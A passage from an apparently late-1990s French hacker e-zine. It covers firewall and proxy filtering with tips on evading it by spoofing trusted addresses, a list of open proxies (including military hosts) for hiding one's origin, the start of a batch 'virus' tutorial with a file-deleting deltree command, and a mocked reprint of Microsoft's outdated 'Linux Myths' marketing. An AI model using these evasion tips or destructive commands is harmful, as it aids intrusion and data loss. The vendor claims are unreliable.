des protocoles. Ainsi il y a 3 caracteristiques a ces routeurs:
- Connaissance des protocoles exigee
- Pas de logs/statistiques d'exploitables
- routeur avc une syntaxe de bas niveau (c'est pas hard a utiliser mais il faut
connaitre les peincipes de base...)
Troisieme solution pour la securite, le firewall EN PLUS du routeur
filtrant ... Les deux feront: du
- filtrage sur les protocoles de communication (donc les trames louches qui
sont regies par ces protocoles ne seront pas acceptes) (;-(
- filtrage sur les applications
- filtrage sur les utilisateurs ;-(
- fichiers logs et statistiques d'utilisation ;-((
- gestion possible de reseaux complexes
On peut aussi mettre le firewall sur le reseau interne, comme ça les
clients (comprenez que le serveur est celui qui reçoit et le client qui
arrive, comme avec Back Orifice: le programme boserve, tarnsforme votre
machine en serveur) se font identifier par le serveur grace au firewall.
On va pas exliquer comment marche un firewall, mais c'est simple: il reçoit
la trame, regarde si c'est bien une trame correspondant aux regles
predefinies par les administrateurs, et ensuite transmet ou non, la trame a
la machine cible. C'est pratique et fiable quand on a un reseau important a
securiser... Mais ça peut poser des inconvenients (Si un inconnu est sur une
machine du reseau, et donc reconnu comme ami, il peut niquer tout le reste
du reseau sans que le firewall agisse).Ou si le backdor utilise un port defini
en tant que rule et spoofe bien il peut se faire passer pour seveur...
C'est pour ça que certains firewall ont des fonctions de demande de confirmation
d'acceptation du paquet par la
machine cible, mais en general desactivees parce que ca fait les fait chier de voir
tout le temps les memes msg pour les memes services...
Autres trucs plus dangereux pour les hackers; certains firewalls font du
CVP (Content Vectoring Protocol) avec les trames envoyees par n'importe qui,
ce qui veut dire que le firewall adresse d'abord les trames a un autre
serveur, ou a un autre routeur ou antivirus(multiple protection doc...).
Ben c'est la le probleme c'est qu'en general c'est un anti-virus qui est
le centre de readressage des trames... ce qui veut dire que quelle que soit
la trame, si y'a un virus connu dedans vous etes grille et ils ont votre IP!!
argh! Ces antivirus fonctionnent en general a 2 en meme temps. Les plus connus
sont Trend Interscan VirusWall, et Norton Antivirus for Firewalls.Bref, apres
verification de la trame, l'antinvirus la re-envoye au firewall,
lui la retransmet ou non, au serveur.
Autre forme de filtrage par CVP c'est celle du flux http, l'Hyper Text
Transfer Protocol (toutes requetes http demandees). Voila etape par etape ce
qui se passe:
- Requete proxy http du client vers le proxy cache (ça va du port 1023 a 80.
80 est le port de navigation par defaut)
- Requete http du proxy cache vers le serveur (requete interceptee par le
firewall)
- Requete http du firewall vers le serveur (le firewall se comporte comme un
proxy de m....!)
- Reponse http du serveur vers le "proxy-firewall" (qui fait proxy a ses
heures perdues :-) )
- Echange CVP pour analyse virale du firewall vers le(s) antivirus
- Reponse du firewall vers le proxy cache, puis vers le premier envoyeur de
la request, c'est a dire vous.(C'est pour ca qu'il faut le faire sur un port
reconnu et en spoofant sur unhe adresse reconnue si possible)
Il en faut du monde pour si peu vous allez me dire. C'est quand meme bien
pratique pour securiser son serveur quand on essaye d'aller dans des
sous-dossiers dont l'acces est interdit a tout etranger, ou meme au scripts
cgi. C'est par la que tout commence pour voir si leur reseau est bien
securise...
Les administrateurs d'un reseau interne supportant un serveur, peuvent
aussi remplacer le firewall par un serveur proxy... Ca marche a peu pres
pareil, sauf que c'est plus efficace pour les requetes http (car
transmission plus rapides, grâce au cache), mais en general les
administrateurs prennent les deux le proxy s'occupant principalement des
requetes http (faut bien comprendre tout cela).
CONCLUSION: la solution que tous les administrateurs devraient choisir
mais qu'ils ne font pas forcement c'est celle ci:
LAN prive protege par un firewall qui est connecte a un proxy anti-virus, et
un deuxieme a un proxy cache (ceci hors connexion internet). Ce meme
firewall (dans le continuite de la connection vers internet) est connecte a
un routeur filtrant, puis au reste (ISP et son modem).Mais bon malgre le cache
ca risque quand meme de les ralentir un peu et comme ils sont presses....
Mais de toute facon pour les petites entreprises et societes il y a moins de
risques car moins de barrages.

10.Liste de proxys
''''''''''''''''''
Si voulez faire comme dans l'article au dessus voila une petite
liste de proxys.Le principe de cette liste est le suivant:si vous la diffusez
quelquepart vous devez rajoutez des proxys.

Code Fournisseur URL port protocole

AE Emirates.Net proxy.emirates.net.ae/proxy.pac
AUTOCONFIG
AR
Broggio
gopher.broggio.com.ar
80
HTTP/FTP
AT
Tecan
www-proxy.tecan.co.at
8080
HTTP/FTP
AU
TAS
www2.transport.tas.gov.au
80
HTTP/FTP
AU
Schools
proxy.schools.net.au
3128
HTTP/FTP
BR
CTelecom
proxy.cybertelecom.com.br
8080
HTTP/FTP
BR
Overnet
vectra.overnet.com.br
3128
HTTP/FTP
CA
Csjlor
www.csjlor.qc.ca
8080
HTTP/FTP
CA
Clasalle
acces.clasalle.qc.ca
8080
HTTP/FTP
CH
Cern
web-cache-2.cern.ch
8080
HTTP/FTP
CH
UniSg
sigma.unisg.ch
3128
HTTP/FTP
CO
Compunet
proxy.compunet.net.co
3128
HTTP/FTP
CZ
Cuni
hamster.ms.mff.cuni.cz
8080
HTTP/FTP
GOPHER / WAIS
SECURITY
CZ
Vutbr
lyn.zlin.vutbr.cz
8080
HTTP/FTP
COM
RR
proxye1-atm.maine.rr.com
8080
HTTP/FTP
COM
McMail
proxy.mcmail.com
8080
HTTP/FTP
COM
Ludexpress
yogsothoth.ludexpress.com
8080
HTTP/FTP
DE
HtwkL
zeus.rz.htwk-leipzig.de
80
HTTP/FTP
GOPHER
DE
Siemens
ramses.erlm.siemens.de
80
HTTP/FTP
DE
U-Rb.
rrznw6.rz.uni-regensburg.de
8080
HTTP/FTP
EDU
Berkeley
smorgasbord.ICSI.Berkeley.EDU
8080
HTTP/FTP
EDU
PurdueNC
Brahma.CC.PurdueNC.Edu
8080
HTTP/FTP
FI
Inet
proxy.inet.fi
800
HTTP/FTP
FI
TPU
proxy.cs.tpu.fi
80
HTTP/FTP
FR
AC
ppar.ac-bordeaux.fr
8080
HTTP/FTP
GOV
Dgs
wall-14.dgs.ca.gov
80
HTTP/FTP
IT
TO
www.focos.to.it
3128
HTTP/FTP
IT
Lcnet
mail.lcnet.it
8080
HTTP/FTP
JP
K-K
lip.kobe-kosen.ac.jp
8080
HTTP/FTP
JP
Fukuoka
kusu.city.kurume.fukuoka.jp
8080
HTTP/FTP
KR
Kyunghee
cvs2.kyunghee.ac.kr
8080
HTTP/FTP
KR
Taegu
biho.taegu.ac.kr
8080
HTTP/FTP
MIL
Dla
cani.dla.mil
8080
HTTP/FTP
MIL
OSD
pgwcm.otd.osd.mil
80
HTTP/FTP
MIL
Navy
gatekeeper.jag.navy.mil
80
HTTP/FTP
MIL
USMC
gate1.yuma.usmc.mil
80
HTTP/FTP
NET
Deltacom
cacheflow1.deltacom.net
8080
HTTP/FTP
NET
Coqui
proxy.coqui.net
80
HTTP/FTP
NL
Nhtv
proxy.nhtv.nl
8080
HTTP/FTP
NL
Tebenet
www.tebenet.nl
8080
HTTP/FTP
ORG
Londonderry
www.londonderry.org
8080
HTTP/FTP
ORG
Aclin
aclin.org
8080
HTTP/FTP
PH
EMC
ascaris.emc.com.ph
8888
HTTP/FTP
PH
Info
mail2.info.com.ph
3128
HTTP/FTP
PT
Isec
leonardo.isec.pt
8080
HTTP/FTP
PT
Teleweb
caclis01.teleweb.pt
3128
HTTP/FTP
PY
Infonet
ns1.infonet.com.py
8080
HTTP/FTP
QA
Qatarnet
proxy.qatar.net.qa
8080
HTTP/FTP
SE
Varnamo
ns.varnamo.se
8080
HTTP/FTP
TR
Turnet
proxy1.turnet.net.tr
8080
HTTP
TR
Turnet
proxy2.turnet.net.tr
8080
HTTP
TW
IS
c1.h202052106.is.net.tw
80
HTTP/FTP
TW
Golden
club.golden.com.tw
8080
HTTP/FTP
UK
Ondemand
cache1.ondemand.co.uk
8080
HTTP/FTP
UK
LUT
double-panic.lut.ac.uk
8080
HTTP/FTP
US
K12
stpauls.pvt.k12.al.us
8080
HTTP/FTP
US
Oh
websense.gcpl.lib.oh.us
8080
HTTP/FTP
ZA
New
cache.new.co.za
8080
HTTP/FTP
ZA
Global
cache02.global.co.za
3128
HTTP/FTP
ZW
Cybergate
proxy.cybergate.co.zw
8080
HTTP/FTP
ZW
Africaonline
proxy.africaonline.co.zw
8080
HTTP/FTP
BE
Infonie
proxy.infonie.be
80 HTTP/FTP
Il faut lire le tableau en diagonale(j'ai ete oblige de faire ca)

11.Comment faire un virus en .bat ??
´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´´
Il faut d'abord connaitre quelques commandes utilisees dans
ce tutorial :

deltree x:\tralalala\*.*
supprime tous les fichiers du repertoire tralalala sur le disque
X qui on comme nom *(tous) et comme extension*(tous)
par exemple pour supprimer le fichier autoexec.bat on met
deltree C:\autoexec.bat

echo ce que vous voulez
fait apparaitre a l'ecran la phrase ce que vous voulez
Pause
stoppe lecran a l'endroit ou vous place cette commande.
La phrase "appuyez sur une touche pour continuer..."apparait.

choice /c:12Q /t:Q /n Votre choix?
if errorlevel 255 goto fin
if errorlevel 3 goto Quit
if errorlevel 2 goto Section2
if errorlevel 1 goto Section1
en clair la 1ere ligne de cette commande pose une question
a l'utilisateur,les reponses possibles sont 1,2 ou Q.
Le parametre /t: indique la derniere reponse possible.
/n indique la question
if errorlevel indique la section ou il faut aller selon le
reponse(ex:si on met 2 ca va a Section2)
le nombre a cote de errorlevel correspond au parametre /c:
(donc Q vaut 3 puisque c'est le troisieme)

cls
cette commande efface tout ce qu'il y a a l'ecran.

Les sections
Un programme en bat peut etre divise en sections:
pour definir une section il faut introduire la commande
:NomDeLaSection
puis toutes les commandes que vous voulez puis un goto pour
quitter ou pour revenir au depart.
Si il n'y a pas de goto ou de Pause a la fin de la section,
le programme se ferme automatiquement.

Bon ca c'etait pour la theorie.
Pour la pratique je mettrai quelques exemples dans BHZ Mag n3.


11 Linux Myths(by Microsoft)
²²²²²²²²²²²²²²²²²²²²²²²²²²²²
Un exemple de ce que ces connards de chez Kro$oft arrivent a pondre.
C'est incroyable de voir a quel point ils sont hypocrites...
Jugez par vous meme..:
With all the recent attention around Linux as an operating system, it's important to step back from the hype and look at
the reality. First, it's worth noting that Linux is a UNIX-like operating system. Linux fundamentally relies on 30-year-old
operating system technology and architecture. Linux was not designed from the ground-up to support symmetrical
multiprocessing (SMP), graphical user interfaces (GUI), asynchronous I/O, fine-grained security model, and many other
important characteristics of a modern operating system. These architectural limitations mean that as customers look for a
platform to cost effectively deploy scalable, secure, and robust applications, Linux simply cannot deliver on the hype.

Myth: Linux performs better than Windows NT

Reality: Windows NT 4.0 Outperforms Linux On Common Customer Workloads

The Linux community claims to have improved performance and scalability in the latest versions of the Linux Kernel (2.2),
however it's clear that Linux remains inferior to the Windows NT® 4.0 operating system.

For File and Print services, according to independent tests conducted by PC Week Labs, the Windows NT 4.0
operating system delivers 52 percent better performance on a single processor system and 110 percent better
performance on a 4-way system than similarly configured single processor and 4-way Linux/SAMBA systems.
For Web servers, the same PC Week tests showed Windows NT 4.0 with Internet Information Server 4.0
delivers 41 percent better performance on a single processor system and 125 percent better performance on a
4-way system than Linux and Apache.
For e-commerce workloads using secure sockets (SSL), recent PC Magazine tests showed Windows NT 4.0 with
Internet Information Server 4.0 delivers approximately five times the performance provided by Linux and
Stronghold.
For transaction-orientated Line of Business applications, Windows NT 4.0 has achieved a result of 40,368 tpmC
at a cost of $18.46 per transaction on a Compaq 8-Way Pentium III XEON processor-based system. This
industry leading price/performance result from the Transaction Processing Performance Council (TPC) clearly
shows how Windows NT can deliver world-class performance for heavy duty transaction processing. It's
interesting to note that there is not a single TPC result on any database running on Linux, and therefore Linux
has yet to demonstrate their capabilities as a database server.
Linux performance and scalability is architecturally limited in the 2.2 Kernel. Linux only supports 2 gigabytes (GB)
of RAM on the x86 architecture,1 compared to 4 GB for Windows NT 4.0. The largest file size Linux supports is 2
GB versus 16 terabytes (TB) for Windows NT 4.0. The Linux SWAP file is limited to 128 MB. In addition, Linux
does not support many of the modern operating system features that Windows NT 4.0 has pioneered such as
asynchronous I/O, completion ports, and fine-grained kernel locks. These architecture constraints limit the ability
of Linux to scale well past two processors.
The Linux community continues to promise major SMP and performance improvements. They have been
promising these since the development of the 2.0 Kernel in 1996. Delivering a scalable system is a complex task
and it's not clear that the Linux community can solve these issues easily or quickly. As D. H. Brown Associates
noted in a recent technical report,2 the Linux 2.2 Kernel remains in the early stages of providing a tuned SMP
kernel.

Myth: Linux is more reliable than Windows NT

Reality: Linux Needs Real World Proof Points Rather than Anecdotal Stories

The Linux community likes to talk about Linux as a stable and reliable operating system, yet there are no real world data
or metrics and very limited customer evidence to back up these claims.

Windows NT 4.0 has been proven in demanding customer environments to be a reliable operating system.
Customers such as Barnes and Noble, The Boeing Company, Chicago Stock Exchange, Dell Computer, Nasdaq
and many others run mission-critical applications on Windows NT 4.0.
Linux lacks a commercial quality Journaling File System. This means that in the event of a system failure (such as
a power outage) data loss or corruption is possible. In any event, the system must check the integrity of the file
system during system restart, a process that will likely consume an extended amount of time, especially on large
volumes and may require manual intervention to reconstruct the file system.
There are no commercially proven clustering technologies to provide High Availability for Linux. The Linux
community may point to numerous projects and small companies that are aiming to deliver High Availability
functionality. D. H. Brown recently noted that these offerings remain immature and largely unproven in the
demanding business world.
There are no OEMs that provide uptime guarantees for Linux, unlike Windows NT where Compaq, Data General,
Hewlett-Packard, IBM, and Unisys provide 99.9 percent system-level uptime guarantees for Windows NT-based
servers.

Myth: Linux is Free

Reality: Free Operating System Does Not Mean Low Total Cost of Ownership

The Linux community will talk about

  
the free or low-cost nature of Linux. It's important to understand that licensing cost
is only a small part of the overall decision-making process for customers.

The cost of the operating system is only a small percentage of the overall total cost of ownership (TCO). In
general Windows NT has proven to have a lower cost of ownership than UNIX. Previous studies have shown
that Windows NT has 37 percent lower TCO than UNIX. There is no reason to believe that Linux is significantly
different than other versions of UNIX when it comes to TCO.
The very definition of Linux as an Open Software effort means that commercial companies like Red Hat will make
money by charging for services. Therefore, commercial support services for Linux will be fee-based and will likely
be priced at a premium. These costs have to be factored into the total cost model.
Linux is a UNIX-like operating system and is therefore complex to configure and manage. Existing UNIX users
may find the transition to Linux easier but administrators for existing Windows®-based or Novell environments
will find it more difficult to handle the complexity of Linux. This retraining will add significant costs to Linux
deployments.
Linux is a higher risk option than Windows NT. For example how many certified engineers are there for Linux?
How easy is it to find skilled development and support people for Linux? Who performs end-to-end testing for
Linux-based solutions? These factors and more need to be taken into account when choosing a platform for
your business.

Myth: Linux is more secure than Windows NT

Reality: Linux Security Model Is Weak

All systems are vulnerable to security issues, however it's important to note that Linux uses the same security model as
the original UNIX implementations--a model that was not designed from the ground up to be secure.

Linux only provides access controls for files and directories. In contrast, every object in Windows NT, from files to
operating system data structures, has an access control list and its use can be regulated as appropriate.
Linux security is all-or-nothing. Administrators cannot delegate administrative privileges: a user who needs any
administrative capability must be made a full administrator, which compromises best security practices. In
contrast, Windows NT allows an administrator to delegate privileges at an exceptionally fine-grained level.
Linux has not supported key security accreditation standards. Every member of the Windows NT family since
Windows NT 3.5 has been evaluated at either a C2 level under the U.S. Government's evaluation process or at a
C2-equivalent level under the British Government's ITSEC process. In contrast, no Linux products are listed on
the U.S. Government's evaluated product list.
Linux system administrators must spend huge amounts of time understanding the latest Linux bugs and
determining what to do about them. This is made complex due to the fact that there isn't a central location for
security issues to be reported and fixed. In contrast Microsoft provides a single security repository for
notification and fixes of security related issues.
Configuring Linux security requires an administrator to be an expert in the intricacies of the operating system
and how components interact. Misconfigure any part of the operating system and the system could be
vulnerable to attack. Windows NT security is easy to set up and administer with tools such as the Security
Configuration Editor.

Myth: Linux can replace Windows on the desktop

Reality: Linux Makes No Sense at the Desktop

Linux as a desktop operating system makes no sense. A user would end up with a system that has fewer applications, is
more complex to use and manage, and is less intuitive.

Linux does not provide support for the broad range of hardware in use today; Windows NT 4.0 currently
supports over 39,000 systems and devices on the Hardware Compatibility List. Linux does not support
important ease-of-use technologies such as Plug and Play, USB, and Power Management
The complexity of the Linux operating system and cumbersome nature of the existing GUIs would make
retraining end-users a huge undertaking and would add significant cost
Linux application support is very limited, meaning that customers end up having to build their own horizontal
and vertical applications. A recent report from Forrester Research highlighted the fact that today 93 percent of
enterprise ISVs develop applications for Windows NT, while only 13 percent develop for Linux.3

Summary
The Linux operating system is not suitable for mainstream usage by business or home users. Today with Windows NT
4.0, customers can be confident in delivering applications that are scalable, secure, and reliable--yet cost effective to
deploy and manage. Linux clearly has a long way to go to be competitive with Windows NT 4.0. With the release of the
Windows 2000 operating system, Microsoft extends the technical superiority of the platform even further ensuring that
customers can deliver the next generation applications to solve their business challenges.

``````````````````````````````````````````````````````````````````````````````````````````````
Et VoilA c'est deja fini!
Si vous vous dites qu'avec le peu de choses qu'il y a dans
ce zine j'aurais pu le sortir plutot je vous emmerde.C'est facile
de critiquer quand on ne fait que lire ce que les autres ecrivent
N'est ce pas Hoper et Seb R.?

Et pour finir quelques citations...

"Sauvez les lamers,formatez leur disque"
#GoY#

"It's nice to be important, il's more important to be nice.
Hack the best,Fuck the rest"
#Leonard(Madchat)#

"Putain,j'en ai rien a foutre de ce zine a la con"
#Flat Eric#

"Nunc est bibendum"
#Asmodeus#

"Consommer de la cafeine de facon abusive peut vous faire devenir l33T"
#PsYkAoS#

l'expérience est comme une lanterne accroché dans le dos de quelqu'un
elle n'éclaire que le passé ;)
#GENOCYD#

"Un jour la France sera démocratique. On peut toujours
rêver..."
#peace&love#

"La chance accorde ses faveurs aux esprits avertis"
#Brain.Override#

"Mort aux cons"
#Hagen#
--------------------------------------------------------------------------------------

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT